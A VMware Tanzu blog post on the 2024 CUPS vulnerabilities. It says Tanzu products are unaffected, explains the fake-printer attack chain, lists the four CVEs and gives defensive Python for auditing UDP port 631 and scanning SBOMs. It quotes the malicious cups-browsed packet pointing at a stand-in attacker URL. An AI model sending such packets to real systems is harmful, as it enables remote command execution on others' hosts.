Tanzu Platform

Speed up your CVE response time with SBOMs

It’s always the firewalls kernel logging ssh printers
How VMware Tanzu handled the CUPS vulnerability

The TL;DR

Tanzu products are not affected by recently announced CUPS vulnerabilities.

Tanzu Platform, Tanzu Platform for Cloud Foundry, Tanzu Data Solution, Tanzu Spring, Tanzu Application Catalog, and Bitnami applications are not impacted by the recently announced CUPS server vulnerabilities. We’ve provided an overview of the situation and a quick fix if your systems might be impacted.

On September 23, 2024, security researcher Simone Margaritelli shared on his X feed that he’d been trying for three weeks to work through the responsible disclosure process for a Severity 9.9 Remote Code Execution (RCE) vulnerability. The disclosure continued to be delayed by a lack of patch availability and CVE identifier assignments. As such, Simone was compelled to share his findings publicly.

At 3PM he posted a link to the OpenPrinting Code of Conduct with a “1 hour to go” message, implying he would be releasing his findings and leaving many security teams guessing, amongst themselves and on public community boards, that this may be related to the Common Unix Printing System, or CUPS.

At 3:59PM Simone posted the link to his findings, including detailed information about his research. As it turns out, it WAS CUPS based. Thank you for the hint, Simone, because even though it ultimately did not impact our products, it did get us ready to respond and forced us to test our security response processes!

Within minutes of the first warning, the Tanzu security and R&D teams started reviewing systems and preparing to analyze the software bill of materials (SBOMs) for the various Tanzu products. We learned quickly that our products were not impacted. HOORAY!

What’s in the cup?

Simone’s research points to an issue with “cups-browsed”, the part of CUPS responsible for discovering and adding printers to the system. He found that CUPS systems with the default configuration allow printers to be added remotely. In analyzing the code, he identified five different input functions, which led him to discover race conditions leading to stack overflows.

Through all of his analysis, Simone determined that it is possible to send cups-browsed a packet containing a malicious URL, “0 3 http://<ATTACKER-IP>:<PORT>/printers/whatever”, which triggers cups-browsed to connect to that URL.

Using this, he was able to create a fake ippserver printer and add it to remote CUPS systems. Once the printer was attached, CUPS created a PostScript Printer Description (PPD) file containing a malicious command that is executed when the printer runs a job.

This results in remote execution of any command through a fake printer added through an unconfigured CUPS service.

Quickly protect your systems

So how do you protect yourself? First, if you are not running a print service, disable CUPS. This is especially important if you have print services on your home or office router that also connects to the internet! A quick search shows there are 91,517 CUPS systems on the internet!

If you need to run CUPS, then be sure you configure it to not allow anyone on the network to connect and add printers!
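To check a Linux host for the listener that CVE-2024-47176 describes (UDP port 631 bound to every interface), the following added example, which is not from the original post, parses the text of /proc/net/udp or /proc/net/udp6. The sample rows are constructed, the function names are illustrative, and a little-endian host is assumed.

```python
import ipaddress

CUPS_BROWSED_PORT = 631  # UDP port named in CVE-2024-47176

def parse_proc_net_udp(text):
    """Yield (ip, port) for each socket listed in /proc/net/udp or /proc/net/udp6 text."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 2 or not fields[0].endswith(":"):
            continue  # header or blank line
        hex_ip, hex_port = fields[1].rsplit(":", 1)
        raw = bytes.fromhex(hex_ip)
        # Assumption: little-endian host (x86, most ARM); the kernel prints each
        # 32-bit word of the address in host byte order.
        packed = b"".join(raw[i:i + 4][::-1] for i in range(0, len(raw), 4))
        yield ipaddress.ip_address(packed), int(hex_port, 16)

def audit_udp_631(text):
    """Return (address, exposure) for every UDP socket bound to port 631."""
    findings = []
    for ip, port in parse_proc_net_udp(text):
        if port != CUPS_BROWSED_PORT:
            continue
        if ip.is_unspecified:
            exposure = "all-interfaces"  # the INADDR_ANY bind the CVE describes
        elif ip.is_loopback:
            exposure = "loopback-only"
        else:
            exposure = "single-address"
        findings.append((str(ip), exposure))
    return findings

# Constructed sample of /proc/net/udp content (not captured from a real host).
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ref pointer drops
  411: 00000000:0277 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 31337 2 0000000000000000 0
  520: 3500007F:0035 00000000:0000 07 00000000:00000000 00:00000000 00000000   101        0 20111 2 0000000000000000 0
  633: 0100007F:0277 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 31400 2 0000000000000000 0
"""

if __name__ == "__main__":
    for path in ("/proc/net/udp", "/proc/net/udp6"):
        try:
            with open(path) as fh:
                print(path, audit_udp_631(fh.read()))
        except OSError:
            print(path, "not readable; sample:", audit_udp_631(SAMPLE))
```

The socket table does not name the owning process, so confirm that an "all-interfaces" hit belongs to cups-browsed before disabling anything.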

What does this mean for VMware Tanzu Customers?

Tanzu products are not impacted by recently announced CUPS vulnerabilities: Tanzu Platform, Tanzu Platform for Cloud Foundry, Tanzu Data Suite, Tanzu Spring Enterprise, Tanzu Application Catalog and Bitnami have all been validated as not having CUPS installed.

Tanzu Platform for Cloud Foundry does have libcups available in the jammy stack for buildpacks and applications that may compile against the library; but CUPS is not installed and it is not possible to run CUPS nor UDP services on Tanzu Platform for Cloud Foundry.

Tanzu Platform for Cloud Foundry customers can also use the compliance scanner to review any foundation and report that “CUPS is not installed” from the included CIS report.

Improve awareness and response time with platform-native SBOM scanning and analysis

The Tanzu security team was able to discover and analyze the SBOMs for all products and product components and quickly determined that not only was CUPS not running, it wasn’t even installed. With vulnerabilities happening so often, a platform with built-in SBOM discovery and analysis capabilities allowed us to rapidly and accurately identify and respond to CVEs. It’s why we built those capabilities, as well as automated SBOM creation, into Tanzu Platform.

Read more about how Tanzu Platform 10 boosts security and speeds innovation here! If you are an existing customer and have any questions please reach out to your account team and ask for a meeting with the Tanzu Security Team.

The vulnerabilities are listed below:

    • CVE-2024-47176 | cups-browsed <= 2.0.1 binds on UDP INADDR_ANY:631 trusting any packet from any source to trigger a Get-Printer-Attributes IPP request to an attacker controlled URL.

    • CVE-2024-47076 | libcupsfilters <= 2.1b1 cfGetPrinterAttributes5 does not validate or sanitize the IPP attributes returned from an IPP server, providing attacker controlled data to the rest of the CUPS system.

    • CVE-2024-47175 | libppd <= 2.1b1 ppdCreatePPDFromIPP2 does not validate or sanitize the IPP attributes when writing them to a temporary PPD file, allowing the injection of attacker controlled data in the resulting PPD.

    • CVE-2024-47177 | cups-filters <= 2.0.1 foomatic-rip allows arbitrary command execution via the FoomaticRIPCommandLine PPD parameter
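The SBOM analysis described earlier can be sketched against the four components listed above. This is an added example, not Tanzu's tooling or code from the original post: it assumes a CycloneDX-style JSON document with a "components" array and Debian-style package names, and the sample SBOM is constructed.

```python
import re

# Last affected upstream version per component, from the CVE list on this page.
AFFECTED = {
    "cups-browsed": ("CVE-2024-47176", "2.0.1"),
    "libcupsfilters": ("CVE-2024-47076", "2.1b1"),
    "libppd": ("CVE-2024-47175", "2.1b1"),
    "cups-filters": ("CVE-2024-47177", "2.0.1"),
}

def version_key(version):
    """Sortable key for the upstream part of '2.1b1' or '1:2.0.0-0ubuntu10'."""
    upstream = version.split(":", 1)[-1].split("-", 1)[0]  # drop epoch, distro revision
    m = re.match(r"(\d+(?:\.\d+)*)(?:~?(a|b|rc)(\d+))?", upstream)
    if not m:
        return None
    nums = tuple(int(n) for n in m.group(1).split("."))
    stage = {"a": 0, "b": 1, "rc": 2, None: 3}[m.group(2)]  # pre-releases sort first
    return (nums + (0,) * (4 - len(nums)), stage, int(m.group(3) or 0))

def walk(components):  # depth-first, so nested components are scanned too
    for comp in components or []:
        yield comp
        yield from walk(comp.get("components"))

def scan_sbom(sbom):  # -> [(name, version, cve, status), ...]
    findings = []
    for comp in walk(sbom.get("components")):
        name, version = comp.get("name", ""), comp.get("version", "")
        # Assumption: Debian-style soname suffixes (libppd2, libcupsfilters2t64).
        base = re.sub(r"\d+(t64)?$", "", name.lower())
        if base in AFFECTED:  # libcups2, the client library, is not in the list
            cve, last_bad = AFFECTED[base]
            key = version_key(version)
            # Distros backport fixes: confirm in-range hits against their advisory.
            status = ("unknown-version" if key is None else "in-affected-range"
                      if key <= version_key(last_bad) else "above-affected-range")
            findings.append((name, version, cve, status))
    return findings

# Constructed sample in CycloneDX JSON shape; not taken from any Tanzu product.
SAMPLE = {"components": [
    {"name": "libcups2", "version": "2.4.1op1-1ubuntu4.11"},
    {"name": "cups-browsed", "version": "2.0.0-0ubuntu10"},
    {"name": "libppd2", "version": "2.1.0-1"},
    {"name": "base-image", "version": "1.0", "components": [
        {"name": "libcupsfilters1", "version": "1.28.15-0ubuntu1"}]}]}

if __name__ == "__main__":
    print(*scan_sbom(SAMPLE), sep="\n")
```

For a real SBOM, load the file with json.load and pass the resulting dictionary to scan_sbom; an empty result corresponds to the "not even installed" outcome described above.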